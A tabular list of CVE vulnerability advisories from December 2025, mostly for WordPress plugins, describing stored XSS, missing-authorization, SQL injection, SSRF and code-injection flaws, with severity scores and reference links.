| kingaddons--King Addons for Elementor 4,000+ ready Elementor sections, 650+ templates, 70+ FREE widgets for Elementor | The King Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Slider, Pricing Calculator, and Image Accordion widgets in all versions up to, and including, 51.1.39 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-7960 | https://www.wordfence.com/threat-intel/vulnerabilities/id/57865837-470e-4afd-bb90-d203a78a210b?source=cve https://wordpress.org/plugins/king-addons/#developers |
| N/A--Vuetify | Improper neutralization of the title date in the 'VDatePicker' component in Vuetify, allows unsanitized HTML to be inserted into the page. This can lead to a Cross-Site Scripting (XSS) https://owasp.org/www-community/attacks/xss attack. The vulnerability occurs because the 'title-date-format' property of the 'VDatePicker' can accept a user created function and assign its output to the 'innerHTML' property of the title element without sanitization. This issue affects Vuetify versions greater than or equal to 2.0.0 and less than 3.0.0. Note: Version 2.x of Vuetify is End-of-Life and will not receive any updates to address this issue. For more information see here https://v2.vuetifyjs.com/en/about/eol/ . | 2025-12-12 | 6.3 | CVE-2025-8082 | https://www.herodevs.com/vulnerability-directory/cve-2025-8082 https://codepen.io/herodevs/pen/dPYGPyR/775285c0fd5a08038d4c85398815d644 |
| jetmonsters--JetWidgets For Elementor | The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Comparison and Subscribe widgets in all versions up to, and including, 1.0.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8195 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8a03f7-a028-401c-9088-77e75dd365f6?source=cve https://plugins.trac.wordpress.org/browser/jetwidgets-for-elementor/tags/1.0.20/includes/addons/jet-widgets-subscribe-form.php https://plugins.trac.wordpress.org/browser/jetwidgets-for-elementor/tags/1.0.20/includes/addons/jet-widgets-image-comparison.php https://wordpress.org/plugins/jetwidgets-for-elementor/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3364453%40jetwidgets-for-elementor&new=3364453%40jetwidgets-for-elementor&sfp_email=&sfph_mail= |
| debuggersstudio--Marquee Addons for Elementor Advanced Elements & Modern Motion Widgets | The MarqueeAddons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Testimonial Marquee widget in all versions up to, and including, 2.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8199 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ab664bc5-ef3c-4e5a-99d5-e3f1bb240a70?source=cve https://wordpress.org/plugins/marquee-addons-for-elementor/#developers https://plugins.trac.wordpress.org/changeset/3349636 |
| yithemes--YITH WooCommerce Quick View | The YITH WooCommerce Quick View plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's yith_quick_view shortcode in all versions up to, and including, 2.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8617 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8d44dcef-6330-4ef6-8385-923e88db669f?source=cve https://plugins.trac.wordpress.org/browser/yith-woocommerce-quick-view/trunk/includes/class.yith-wcqv-frontend.php#L216 https://wordpress.org/plugins/yith-woocommerce-quick-view https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3353775%40yith-woocommerce-quick-view&new=3353775%40yith-woocommerce-quick-view&sfp_email=&sfph_mail= |
| themelooks--Enter Addons Ultimate Template Builder for Elementor | The Enter Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown and Image Comparison widgets in all versions up to, and including, 2.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8687 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bcd6c085-9fd8-43d9-b244-ab91146f610f?source=cve https://wordpress.org/plugins/enteraddons/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3383539%40enteraddons&new=3383539%40enteraddons&sfp_email=&sfph_mail= |
| shamsbd71--All-in-One Addons for Elementor WidgetKit | The All-in-One Addons for Elementor - WidgetKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Team and Countdown widgets in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8779 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dbbdf433-8589-4f5f-b73d-2dba58f684a7?source=cve https://wordpress.org/plugins/widgetkit-for-elementor/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378162%40widgetkit-for-elementor&new=3378162%40widgetkit-for-elementor&sfp_email=&sfph_mail= |
| livemesh--Livemesh SiteOrigin Widgets | The Livemesh SiteOrigin Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Hero Header and Pricing Table widgets in all versions up to, and including, 3.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-8780 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eae0783a-a409-4947-b837-aee219b4d445?source=cve https://wordpress.org/plugins/livemesh-siteorigin-widgets/#developers https://plugins.trac.wordpress.org/changeset/3390558/livemesh-siteorigin-widgets/trunk/includes/widgets/lsow-hero-image-widget/tpl/default.php https://plugins.trac.wordpress.org/changeset/3390558/livemesh-siteorigin-widgets/trunk/includes/widgets/lsow-pricing-table-widget/tpl/default.php |
| trustindex--Widgets for Google Reviews | The Widgets for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `trustindex` shortcode in all versions up to, and including, 13.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-11 | 6.4 | CVE-2025-9436 | https://www.wordfence.com/threat-intel/vulnerabilities/id/94974552-1c52-417b-9b4e-c30fd13a8ad4?source=cve https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.0/trustindex-plugin.class.php#L803 |
| davidanderson--Redux Framework | The Redux Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameter in all versions up to, and including, 4.5.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-9488 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cabf776d-8749-45a8-94c1-7d1eef93a183?source=cve https://plugins.trac.wordpress.org/browser/redux-framework/tags/4.5.7/redux-core/inc/extensions/shortcodes/class-redux-shortcodes.php#L205 https://wordpress.org/plugins/redux-framework/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402803%40redux-framework&new=3402803%40redux-framework&sfp_email=&sfph_mail=#file22 |
| popupbuilder--Popup Builder Create highly converting, mobile friendly marketing popups. | The Popup Builder - Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sg_popup' shortcode in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-9856 | https://www.wordfence.com/threat-intel/vulnerabilities/id/beb6b26a-3fe1-44e0-9fda-97b288abf735?source=cve https://plugins.trac.wordpress.org/browser/popup-builder/tags/4.4.0/com/helpers/AdminHelper.php#L438 https://plugins.trac.wordpress.org/browser/popup-builder/tags/4.4.0/com/classes/popups/SGPopup.php#L1368 https://plugins.trac.wordpress.org/changeset/3384281 |
| a3rev--a3 Lazy Load | The a3 Lazy Load plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-9873 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d837229-52fa-42ae-b733-8fbeb444f110?source=cve https://plugins.trac.wordpress.org/browser/a3-lazy-load/trunk/classes/class-a3-lazy-load.php#L430 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3377146%40a3-lazy-load&new=3377146%40a3-lazy-load&sfp_email=&sfph_mail= |
| Essential Plugin--Slider a SlidersPack | Missing Authorization vulnerability in Essential Plugin Slider a SlidersPack allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Slider a SlidersPack: from n/a before 2.3. | 2025-12-09 | 5.3 | CVE-2022-46845 | https://vdp.patchstack.com/database/wordpress/plugin/sliderspack-all-in-one-image-sliders/vulnerability/wordpress-slider-a-sliderspack-image-slider-post-slider-acf-gallery-slider-plugin-2-0-2-broken-access-control?_s_id=cve |
| Brainstorm Force--Spectra | Missing Authorization vulnerability in Brainstorm Force Spectra allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Spectra: from n/a through 2.3.0. | 2025-12-09 | 5.4 | CVE-2023-23729 | https://vdp.patchstack.com/database/wordpress/plugin/ultimate-addons-for-gutenberg/vulnerability/wordpress-spectra-wordpress-gutenberg-blocks-plugin-2-3-0-contributor-recaptcha-settings-change-vulnerability?_s_id=cve |
| Fortinet--FortiPortal | A key management errors vulnerability in Fortinet FortiAnalyzer 7.4.0 through 7.4.2, FortiAnalyzer 7.2.0 through 7.2.5, FortiAnalyzer 7.0 all versions, FortiAnalyzer 6.4 all versions, FortiManager 7.4.0 through 7.4.2, FortiManager 7.2.0 through 7.2.5, FortiManager 7.0 all versions, FortiManager 6.4 all versions, FortiOS 7.6.0, FortiOS 7.4.4, FortiOS 7.2.7, FortiOS 7.0.14, FortiPortal 6.0 all versions may allow an authenticated admin to retrieve a certificate's private key via the device's admin shell. | 2025-12-11 | 5.9 | CVE-2024-40593 | https://fortiguard.fortinet.com/psirt/FG-IR-24-133 |
| HCL Software--Workload Scheduler | HCL Workload Scheduler stores user credentials in plain text which can be read by a local user. | 2025-12-11 | 5.5 | CVE-2024-42197 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127448 |
| wssoffice21--Filter & Grids | The Filter & Grids plugin for WordPress is vulnerable to SQL Injection via the 'phrase' parameter in all versions up to, and including, 3.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This only works on MariaDB as the query results in a syntax error on MySQL. | 2025-12-13 | 5.9 | CVE-2025-10289 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f8bbab6e-ed2f-4b90-a658-aae85906d06e?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378420%40ymc-smart-filter&new=3378420%40ymc-smart-filter&sfp_email=&sfph_mail= |
| TalentSoft Software--e-BAP Automation | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TalentSoft Software e-BAP Automation allows Cross-Site Scripting (XSS). This issue affects e-BAP Automation: from 1.8.96 before v.41815. | 2025-12-09 | 5.3 | CVE-2025-10876 | https://www.usom.gov.tr/bildirim/tr-25-0434 |
| themeisle--RSS Aggregator by Feedzy Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator | The RSS Aggregator by Feedzy - Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 5.1.1 via the feedzy_lazy_load function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-11 | 5.8 | CVE-2025-11467 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5754dce7-6b47-4490-a04a-7eabfded0720?source=cve https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/5.1.0/includes/abstract/feedzy-rss-feeds-admin-abstract.php#L551 |
| webfactory--Login Lockdown & Protection | The Login Lockdown & Protection plugin for WordPress is vulnerable to IP Block Bypass in all versions up to, and including, 2.14. This is due to $unblock_key key being insufficiently random allowing unauthenticated users, with access to an administrative user email, to generate valid unblock keys for their IP Address. This makes it possible for unauthenticated attackers to bypass blocks due to invalid login attempts. | 2025-12-13 | 5.3 | CVE-2025-11707 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9c732ea2-0263-4b18-9aa4-29e387b26362?source=cve https://plugins.trac.wordpress.org/browser/login-lockdown/trunk/libs/functions.php https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389843%40login-lockdown&new=3389843%40login-lockdown&sfp_email=&sfph_mail= |
| icegram--Email Subscribers & Newsletters Powerful Email Marketing, Post Notification & Newsletter Plugin for WordPress & WooCommerce | The Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 5.9.10. This is due to the plugin not properly verifying that a user is authorized to perform an action in the `run_action_scheduler_task` function. This makes it possible for unauthenticated attackers to execute scheduled actions early or repeatedly by guessing action IDs, potentially triggering email sends, maintenance tasks, or other privileged operations, causing unexpected state changes and resource usage. | 2025-12-12 | 5.3 | CVE-2025-12348 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c6ba7244-0ecf-412f-9b8b-6b81fa6cdeb5?source=cve https://plugins.trac.wordpress.org/browser/email-subscribers/tags/5.9.4/lite/includes/classes/class-es-queue.php#L50 https://plugins.trac.wordpress.org/browser/email-subscribers/tags/5.9.4/lite/includes/classes/class-ig-es-background-process-helper.php#L194 https://plugins.trac.wordpress.org/changeset/3394838/email-subscribers/trunk/lite/includes/classes/class-ig-es-background-process-helper.php |
| saadiqbal--myCred Points Management System For Gamification, Ranks, Badges, and Loyalty Program. | The myCred - Points Management System For Gamification, Ranks, Badges, and Loyalty Program plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.9.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to approve withdrawal requests, modify user point balances, and manipulate the payment processing system via the cashcred_pay_now AJAX action. | 2025-12-13 | 5.3 | CVE-2025-12362 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af54654b-60af-446d-b170-ee0a1ebed22c?source=cve https://plugins.trac.wordpress.org/browser/mycred/tags/2.9.5.1/addons/cash-creds/modules/cashcred-module-core.php#L141 https://plugins.trac.wordpress.org/changeset/3417299/mycred/trunk?contextall=1&old=3410754&old_path=%2Fmycred%2Ftrunk#file0 |
| netweblogic--Events Manager Calendar, Bookings, Tickets, and more! | The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 7.2.2.2 via the 'get_location' action due to insufficient restrictions on which locations can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft event locations that they should not have access to. | 2025-12-12 | 5.3 | CVE-2025-12408 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8470b7be-6fae-4941-b523-93e230366522?source=cve https://plugins.trac.wordpress.org/changeset/3392395/events-manager/trunk/em-actions.php |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 25.0.0.12 are affected by cross-site scripting due to improper validation of user-supplied input. An attacker could exploit this vulnerability by using a specially crafted URL to redirect the user to a malicious site. | 2025-12-08 | 5.4 | CVE-2025-12635 | https://www.ibm.com/support/pages/node/7254078 |
| hippooo--Hippoo Mobile App for WooCommerce | The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to arbitrary file write via a missing authorization check in all versions up to, and including, 1.7.1. This is due to the REST API endpoint `/wp-json/hippoo/v1/wc/token/save_callback/{token_id}` being registered with `permission_callback => '__return_true'`, which allows unauthenticated access. This makes it possible for unauthenticated attackers to write arbitrary JSON content to the server's publicly accessible upload directory via the vulnerable endpoint. | 2025-12-12 | 5.3 | CVE-2025-12655 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d34701a0-c745-441c-8d6c-7befc877f8d0?source=cve https://plugins.trac.wordpress.org/browser/hippoo/tags/1.6.1/app/web_api.php#L45 https://plugins.trac.wordpress.org/browser/hippoo/tags/1.6.1/app/web_api.php#L117 https://plugins.trac.wordpress.org/browser/hippoo/tags/1.6.1/app/utils.php#L1 |
| campay--Campay Woocommerce Payment Gateway | The Campay Woocommerce Payment Gateway plugin for WordPress is vulnerable to Unauthenticated Payment Bypass in all versions up to, and including, 1.2.2. This is due to the plugin not properly validating that a transaction has occurred through the payment gateway. This makes it possible for unauthenticated attackers to bypass payments and mark orders as successfully completed resulting in a loss of income. | 2025-12-12 | 5.3 | CVE-2025-12883 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2f12fa00-6108-4bd4-9310-8558211f4d0f?source=cve https://wordpress.org/plugins/campay-api/ |
| ajitdas--Devs CRM Manage tasks, attendance and teams all together | The Devs CRM - Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the /wp-json/devs-crm/v1/attendances REST API Endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to retrieve private user data, including password hashes. | 2025-12-13 | 5.3 | CVE-2025-13092 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c520d-4843-4ef1-8c96-cbf0eaab58cb?source=cve https://wordpress.org/plugins/devs-crm/ |
| ajitdas--Devs CRM Manage tasks, attendance and teams all together | The Devs CRM - Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/devs-crm/v1/bulk-update' REST-API endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to update leads tags. | 2025-12-13 | 5.3 | CVE-2025-13093 | https://www.wordfence.com/threat-intel/vulnerabilities/id/78794ea4-6eff-4e6f-af0a-dd8cab8ac859?source=cve https://wordpress.org/plugins/devs-crm/ |
| IBM--Aspera Orchestrator | IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow an authenticated user to cause a denial of service in the email service due to improper control of interaction frequency. | 2025-12-11 | 5.3 | CVE-2025-13211 | https://www.ibm.com/support/pages/node/7254434 |
| Kubernetes--Kubernetes | A half-blind Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager when using the in-tree Portworx StorageClass. This vulnerability allows authorized users to leak arbitrary information from unprotected endpoints in the control plane's host network (including link-local or loopback services). | 2025-12-14 | 5.8 | CVE-2025-13281 | https://github.com/kubernetes/kubernetes/issues/135525 https://groups.google.com/g/kubernetes-security-announce/c/EORqZg0k1l4/m/TtD-q0v7AgAJ |
| markutos987--Product Filtering by Categories, Tags, Price Range for WooCommerce Filter Plus | The Product Filtering by Categories, Tags, Price Range for WooCommerce - Filter Plus plugin for WordPress is vulnerable to unauthorized modification of data in all versions up to, and including, 1.1.5 due to a missing capability check on the 'filter_save_settings' and 'add_filter_options' AJAX actions. This makes it possible for unauthenticated attackers to modify the plugin's settings and create arbitrary filter options. | 2025-12-12 | 5.3 | CVE-2025-13314 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c9686681-4e64-43f1-ba0a-56d10c8d1db9?source=cve https://plugins.trac.wordpress.org/browser/filter-plus/tags/1.1.5/core/admin/settings/action.php#L23 https://plugins.trac.wordpress.org/browser/filter-plus/tags/1.1.5/core/admin/settings/action.php#L82 https://plugins.trac.wordpress.org/browser/filter-plus/tags/1.1.5/core/admin/settings/action.php#L28 https://plugins.trac.wordpress.org/browser/filter-plus/tags/1.1.5/base/enqueue.php#L178 |
| emarket-design--Employee Spotlight Team Member Showcase & Meet the Team Plugin | The Employee Spotlight - Team Member Showcase & Meet the Team Plugin for WordPress is vulnerable to unauthorized tracking settings modification due to missing authorization validation on the employee_spotlight_check_optin() function in all versions up to, and including, 5.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable or disable tracking settings. | 2025-12-13 | 5.3 | CVE-2025-13403 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19738a82-8c31-45bb-a869-68e357299eb5?source=cve https://plugins.trac.wordpress.org/browser/employee-spotlight/trunk/includes/plugin-feedback-functions.php#L19 https://plugins.trac.wordpress.org/browser/employee-spotlight/tags/5.1.3/includes/plugin-feedback-functions.php#L19 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3418117%40employee-spotlight&new=3418117%40employee-spotlight&sfp_email=&sfph_mail= |
| premmerce--Premmerce Wishlist for WooCommerce | The Premmerce Wishlist for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.1.10. This is due to a missing capability check on the deleteWishlist() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary wishlists. | 2025-12-12 | 5.3 | CVE-2025-13440 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9347900c-61c2-4d63-885e-e971c646b737?source=cve https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-wishlist/trunk/src/Admin/Admin.php#L334 https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-wishlist/tags/1.1.10/src/Admin/Admin.php#L334 |
| properfraction--Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content ProfilePress | The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content - ProfilePress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.16.7 due to insufficient input sanitization on the `type` parameter in the form preview functionality. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes via the `pp_preview_form` endpoint. | 2025-12-09 | 5.4 | CVE-2025-13642 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4736d139-814e-4eeb-91e8-5ee41fc35a8f?source=cve https://plugins.trac.wordpress.org/browser/wp-user-avatar/trunk/src/Classes/FormPreviewHandler.php#L71 https://plugins.trac.wordpress.org/browser/wp-user-avatar/trunk/src/Classes/FormPreviewHandler.php#L15 https://plugins.trac.wordpress.org/changeset/3408055/ |
| rcatheme--Guest Support | The Guest Support plugin for WordPress is vulnerable to User Email Disclosure in versions up to, and including, 1.2.3. This is due to the plugin exposing a public AJAX endpoint that allows anyone to search for and retrieve user email addresses without any authentication or capability checks. This makes it possible for unauthenticated attackers to enumerate user accounts and extract email addresses via the guest_support_handler=ajax endpoint with the request=get_users parameter. | 2025-12-12 | 5.3 | CVE-2025-13660 | https://www.wordfence.com/threat-intel/vulnerabilities/id/01299aba-0dff-47fd-9e90-ee84f00a0f3b?source=cve https://plugins.trac.wordpress.org/browser/guest-support/trunk/includes/library/ajax.php#L22 https://plugins.trac.wordpress.org/browser/guest-support/tags/1.2.3/includes/library/ajax.php#L22 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412822%40guest-support&new=3412822%40guest-support&sfp_email=&sfph_mail= |
| mailerlite--MailerLite Signup forms (official) | The MailerLite - Signup forms (official) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'form_description' and 'success_message' parameters in versions up to, and including, 1.7.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 5.5 | CVE-2025-13993 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8c37cc28-fde0-45c6-b49c-d6dfb296c4a5?source=cve https://plugins.trac.wordpress.org/browser/official-mailerlite-sign-up-forms/tags/1.7.14/src/Controllers/AdminController.php#L179 https://plugins.trac.wordpress.org/browser/official-mailerlite-sign-up-forms/tags/1.7.14/src/Controllers/AdminController.php#L224 https://plugins.trac.wordpress.org/browser/official-mailerlite-sign-up-forms/tags/1.7.14/src/Views/CustomForm.php#L38 https://plugins.trac.wordpress.org/browser/official-mailerlite-sign-up-forms/tags/1.7.14/src/Views/CustomForm.php#L94 https://plugins.trac.wordpress.org/changeset/3416100/official-mailerlite-sign-up-forms/trunk/src/Controllers/AdminController.php |
| rodolforizzo76--Simple Bike Rental | The Simple Bike Rental plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'simpbire_carica_prenotazioni' AJAX action in all versions up to, and including, 1.0.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve all booking records containing customers' personally identifiable information (PII), including names, email addresses, and phone numbers. | 2025-12-12 | 5.3 | CVE-2025-14065 | https://www.wordfence.com/threat-intel/vulnerabilities/id/06f4e758-3328-4ac1-956a-cfadddd12e53?source=cve https://plugins.trac.wordpress.org/browser/simple-bike-rental/trunk/includes/ajax.php#L137 https://plugins.trac.wordpress.org/browser/simple-bike-rental/tags/1.0.5/includes/ajax.php#L137 https://plugins.trac.wordpress.org/changeset/3414692/simple-bike-rental/ |
| addonsorg--PDF for Contact Form 7 + Drag and Drop Template Builder | The PDF for Contact Form 7 + Drag and Drop Template Builder plugin for WordPress is vulnerable to unauthorized post duplication due to a missing capability check on the 'rednumber_duplicate' function in all versions up to, and including, 6.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to duplicate arbitrary posts, including password protected or private ones. | 2025-12-12 | 5.3 | CVE-2025-14074 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d00b50c-949a-4fd0-9eab-3555d263fcc7?source=cve https://plugins.trac.wordpress.org/browser/pdf-for-contact-form-7/trunk/backend/index.php#L697 https://plugins.trac.wordpress.org/browser/pdf-for-contact-form-7/tags/6.3.2/backend/index.php#L697 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416014%40pdf-for-contact-form-7&new=3416014%40pdf-for-contact-form-7&sfp_email=&sfph_mail= |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in GLib (Gnome Lib). This vulnerability allows a remote attacker to cause heap corruption, leading to a denial of service or potential code execution via a buffer-underflow in the GVariant parser when processing maliciously crafted input strings. | 2025-12-10 | 5.6 | CVE-2025-14087 | https://access.redhat.com/security/cve/CVE-2025-14087 RHBZ#2419093 |
| ludwigyou--WPMasterToolKit (WPMTK) All in one plugin | The WPMasterToolKit plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.13.0. This is due to the plugin allowing Author-level users to create and execute arbitrary PHP code through the Code Snippets feature without proper capability checks. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server, leading to remote code execution, privilege escalation, and complete site compromise. | 2025-12-12 | 5.3 | CVE-2025-14166 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6049996a-514a-44f7-9878-4aa43598842a?source=cve https://plugins.trac.wordpress.org/browser/wpmastertoolkit/trunk/admin/modules/core/class-code-snippets.php#L135 https://plugins.trac.wordpress.org/browser/wpmastertoolkit/tags/2.13.0/admin/modules/core/class-code-snippets.php#L135 https://plugins.trac.wordpress.org/browser/wpmastertoolkit/trunk/admin/modules/core/class-code-snippets.php#L628 https://plugins.trac.wordpress.org/browser/wpmastertoolkit/tags/2.13.0/admin/modules/core/class-code-snippets.php#L628 https://plugins.trac.wordpress.org/log/wpmastertoolkit/ |
| stiand--Vimeo SimpleGallery | The Vimeo SimpleGallery plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 0.2. This is due to missing authorization checks on the `vimeogallery_admin` function hooked to `admin_menu`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary plugin settings via the `action` parameter. | 2025-12-12 | 5.3 | CVE-2025-14170 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb28557-7023-481f-a05b-0b9a22d7a456?source=cve https://plugins.trac.wordpress.org/browser/vimeo-simplegallery/trunk/vimeo_simplegallery.php#L22 https://plugins.trac.wordpress.org/browser/vimeo-simplegallery/tags/0.2/vimeo_simplegallery.php#L22 |
| Ilevia--EVE X1 Server | A vulnerability was determined in Ilevia EVE X1 Server up to 4.6.5.0.eden. Impacted is an unknown function of the file /ajax/php/leaf_search.php. This manipulation of the argument line causes command injection. The attack can be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is considered difficult. The exploit has been publicly disclosed and may be utilized. Upgrading the affected component is recommended. The vendor confirms the issue and recommends: "We already know that issue and on most devices are already solved, also it's not needed to open the port to outside world so we advised our customer to close it". | 2025-12-08 | 5.6 | CVE-2025-14276 | VDB-334802 | Ilevia EVE X1 Server leaf_search.php command injection VDB-334802 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702649 | Ilevia Srl. Ilevia EVE X1 Server 4.6.5.0.eden Command Injection https://www.yuque.com/yuqueyonghuexlgkz/zepczx/ahygt5u6sgqpk5tt?singleDoc |
